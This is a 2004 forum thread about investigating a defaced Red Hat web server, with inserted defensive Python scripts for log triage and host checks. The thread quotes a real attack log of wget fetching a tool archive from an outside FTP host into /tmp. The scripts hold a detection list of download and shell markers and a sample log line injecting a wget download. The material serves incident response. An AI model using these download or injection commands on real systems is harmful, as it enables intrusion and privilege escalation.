LinuxQuestions.org
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Old 11-30-2004, 12:50 PM   #1
abesharp
LQ Newbie
 
Registered: Nov 2004
Posts: 3

Rep: Reputation: 0
RedHat 7.2 server hacked and all $HOME/public_html/index.htm files replaced


Hi,
I wonder if anyone can explain how the following problem might have occurred. On the server in question there are a number of users hosting websites in their $HOME/public_html directories. This morning, the index file in each directory (be it index.htm, index.html or index.php) was replaced with an index file (with the same extension as the one that was originally there) containing some kind of anti-war message in Spanish. I was able to restore the correct files from a backup.

I can find no evidence of how this might have occurred. The ownerships and permissions of all the files were unchanged. Nobody had (or would have been able to) log in by means of SSH, and the messages log showed no evidence of FTP logins.

I think it might have been due to a problem with a PHP or Perl script on somebody's website and as a precaution I have upgraded Apache and MySQL to the latest versions, also found a couple of formmail.pl scripts in users' cgi-bin directories and removed them. But I am just guessing really because I don't know how the problem happened in the first place. Does anyone have any idea about how it might have happened, or how to go about finding the cause?

Many thanks
Abe
 
Old 11-30-2004, 02:11 PM   #2
hostprotect
Member
 
Registered: Nov 2004
Posts: 56

Rep: Reputation: 15
You could sort through your httpd logs. Look for access times so you could pinpoint what happened around the time of the file changes. Also grab a webserver scanner like nikto (cirt.net). It will be able to tell you if you have any immediate script flaws.


Cheers,
Ryan
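An added worked example of the log triage Ryan suggests (not code from this thread or from any of the posters): parse Apache combined-format access-log lines, keep only the requests within a window around the time the index files were changed (the mtime of a defaced file is a good anchor), and flag requests whose URL-decoded query carries things a forum page never needs, such as a download tool or a path under /tmp. The log lines, IP addresses and hostname are constructed for the example.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import unquote

# Apache "combined" access-log format; the timestamp carries a UTC offset.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Markers that do not belong in a request to a static page or a forum script:
# download tools, the scratch directory, permission changes, shell pipes.
SUSPICIOUS = ("wget ", "curl ", "lynx ", "/tmp/", "chmod ", "| sh", ";sh")

# Constructed sample log lines (documentation-range IPs, an invalid hostname);
# not taken from the poster's server.
SAMPLE_LOG = [
    '198.51.100.7 - - [30/Nov/2004:20:10:02 -0500] "GET /index.html HTTP/1.1" 200 1843 "-" "Mozilla/4.0"',
    '203.0.113.5 - - [30/Nov/2004:21:54:31 -0500] "GET /forum/viewtopic.php?t=1&x='
    'wget%20ftp%3A%2F%2Fexample.invalid%2Ftool.tar.gz%20-O%20%2Ftmp%2Ftool.tar.gz HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
    '192.0.2.44 - - [30/Nov/2004:21:58:10 -0500] "GET /~bob/index.htm HTTP/1.1" 200 2211 "-" "Mozilla/5.0"',
]


def parse_ts(text):
    """Parse a log-style timestamp such as '30/Nov/2004:21:55:00 -0500'."""
    return datetime.strptime(text, TS_FMT)


def parse_line(line):
    """Split one combined-format line into fields; None if the line does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["ts"] = parse_ts(entry["ts"])
    # Decode twice: injected commands are often URL-encoded a second time so
    # that the web server's own decode leaves them intact for the script.
    entry["decoded"] = unquote(unquote(entry["req"]))
    return entry


def entries_near(lines, when, minutes=30):
    """Entries whose timestamp lies within +/- `minutes` of `when`
    (for instance the mtime of the defaced index file)."""
    lo, hi = when - timedelta(minutes=minutes), when + timedelta(minutes=minutes)
    found = []
    for line in lines:
        e = parse_line(line)
        if e is not None and lo <= e["ts"] <= hi:
            found.append(e)
    return found


def flag_suspicious(entries):
    """(entry, marker) for every entry whose decoded request contains a marker."""
    hits = []
    for e in entries:
        decoded = e["decoded"].lower()
        for marker in SUSPICIOUS:
            if marker in decoded:
                hits.append((e, marker))
                break
    return hits


def triage(lines, defacement_ts, minutes=30):
    """Convenience wrapper: (ip, decoded request, marker) for suspicious hits
    in the window around the defacement time given as a log-style string."""
    hits = flag_suspicious(entries_near(lines, parse_ts(defacement_ts), minutes))
    return [(e["ip"], e["decoded"], marker) for e, marker in hits]


if __name__ == "__main__":
    for ip, req, marker in triage(SAMPLE_LOG, "30/Nov/2004:21:55:00 -0500"):
        print(f"{ip}  matched {marker!r}: {req}")
```

Run it against a real access_log by reading the file into `lines` and passing the defaced file's mtime (formatted like the log) as `defacement_ts`; widen `minutes` if the attacker's reconnaissance requests came earlier than the defacement itself.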
 
Old 12-01-2004, 06:22 AM   #3
abesharp
LQ Newbie
 
Registered: Nov 2004
Posts: 3

Original Poster
Rep: Reputation: 0
Thanks Ryan,
I looked in the httpd error_log and found numerous entries like this:

--21:54:38-- ftp://darktr0jan:*password*@gate.pol.../neon20.tar.gz
=> `neon20.tar.gz.59'
Resolving gate.polarhome.com... done.
Connecting to gate.polarhome.com[81.216.198.11]:21... connected.
Logging in as darktr0jan ... Logged in!
==> SYST ... done. ==> PWD ... done.
==> TYPE I ... done. ==> CWD /bandy ... done.
==> PORT ... done. ==> RETR neon20.tar.gz ... done.
Length: 26,405 (unauthoritative)

0K .......... .......... ..... 100% 7.13 KB/s

21:54:56 (7.13 KB/s) - `neon20.tar.gz.59' saved [26405]

...and found the corresponding file in /tmp. Also in /tmp there was a hidden folder called .f containing a 'kmod' executable with SUID permissions. So I guess that was it ...

But I would really like to prevent httpd from allowing people to do this kind of stuff!
Thanks
Abe
 
Old 12-01-2004, 05:52 PM   #4
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 69
If you haven't been keeping up with security updates (and Redhat 7.2 hasn't been supported for some time now), then there were likely a number of security vulnerabilities in your system. The kmod stuff is likely an exploit for the kernel ptrace vuln that allowed an attacker to gain root privileges on the system. So if your kernel hasn't been updated, then you could be in real trouble. Finding the point of entry is important, but updating software after-the-fact makes it kind of pointless once they've gained access.

You should go through all the security and system logs, keeping an eye open for kernel panics or oops or any other application error/failures that could be a clue that something was exploited. I'd also recommend going through the bash_history files of all the users, especially root, looking for strange activity. Take a look at /etc/passwd for any new users or users with a UID of 0. Run rpm -Va to verify integrity of system packages and definitely download chkrootkit or rootkit hunter and run a scan to look for signs of an intrusion.

Last edited by Capt_Caveman; 12-01-2004 at 05:53 PM.
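An added worked example (not code from this thread, from any poster, or from chkrootkit/rkhunter) that automates three of the host checks raised in posts #3 and #4: a hidden directory under /tmp holding a setuid binary, extra UID-0 accounts in /etc/passwd, and rpm -Va reporting binaries whose size or digest no longer matches the package. The passwd content and the rpm -Va output below are constructed samples; on a real host you would read /etc/passwd and the captured output of `rpm -Va` instead.

```python
import os
import re
import stat

# --- /etc/passwd: any account besides root with UID 0 is a red flag ---------
# Constructed sample, including one planted UID-0 account.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
abe:x:500:500::/home/abe:/bin/bash
sysadm:x:0:0::/tmp/.f:/bin/bash
"""


def uid0_accounts(passwd_text):
    """Usernames with UID 0 other than 'root'."""
    found = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 3 and fields[2] == "0" and fields[0] != "root":
            found.append(fields[0])
    return found


# --- setuid files: a SUID binary under /tmp (hidden dir or not) is never legit --
def is_suid(mode):
    """True for a regular file with the setuid bit set, given an st_mode value."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)


def suid_files(root):
    """Walk `root` (os.walk descends into dot-directories such as /tmp/.f too)
    and return the paths of setuid regular files."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if is_suid(st.st_mode):
                hits.append(path)
    return hits


# --- rpm -Va: parse verification output, report changed non-config files -----
# Constructed sample output. Flag columns: S size, M mode, 5 MD5 digest,
# D device, L link, U user, G group, T mtime; a 'c' after the flags marks
# a config file, whose changes are usually legitimate.
SAMPLE_RPM_VA = """\
S.5....T    /bin/ls
.......T  c /etc/ssh/sshd_config
S.5....T    /bin/netstat
missing     /usr/sbin/lsof
"""
VERIFY_RE = re.compile(r"^([S.M5DLUGTP?]{8,9})\s+(?:([cdglr])\s+)?(/\S+)$")


def modified_binaries(verify_output):
    """Return (changed, missing): non-config paths whose size or digest
    differs from the package, and paths the package says should exist."""
    changed, missing = [], []
    for line in verify_output.splitlines():
        if line.startswith("missing"):
            missing.append(line.split()[-1])
            continue
        m = VERIFY_RE.match(line)
        if not m:
            continue
        flags, attr, path = m.groups()
        if attr != "c" and ("S" in flags or "5" in flags):
            changed.append(path)
    return changed, missing


if __name__ == "__main__":
    print("extra UID-0 accounts:", uid0_accounts(SAMPLE_PASSWD))
    print("setuid files under /tmp:", suid_files("/tmp"))
    changed, missing = modified_binaries(SAMPLE_RPM_VA)
    print("changed package binaries:", changed)
    print("missing package files:", missing)
```

The rpm check only trusts the rpm database and binary on the host; on a rooted box both can be tampered with, which is why the thread's advice to rebuild rather than clean is the safer conclusion.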
 
Old 12-01-2004, 08:03 PM   #5
hostprotect
Member
 
Registered: Nov 2004
Posts: 56

Rep: Reputation: 15
I would recommend a re-install of the OS. Also get in contact with the abuse admin for www.polarhome.com about the "cracker" getting his tools from a legit site he/she may have.


Cheers
 
Old 12-09-2004, 03:05 AM   #6
abesharp
LQ Newbie
 
Registered: Nov 2004
Posts: 3

Original Poster
Rep: Reputation: 0
Thanks everyone. It turned out to be due to the phpBB 2 'highlighting' exploit ...
http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513
Before becoming aware of this, I ended up re-installing the OS on the compromised server and moving the hosting accounts on it onto a different server, which was then itself hacked! :-(
 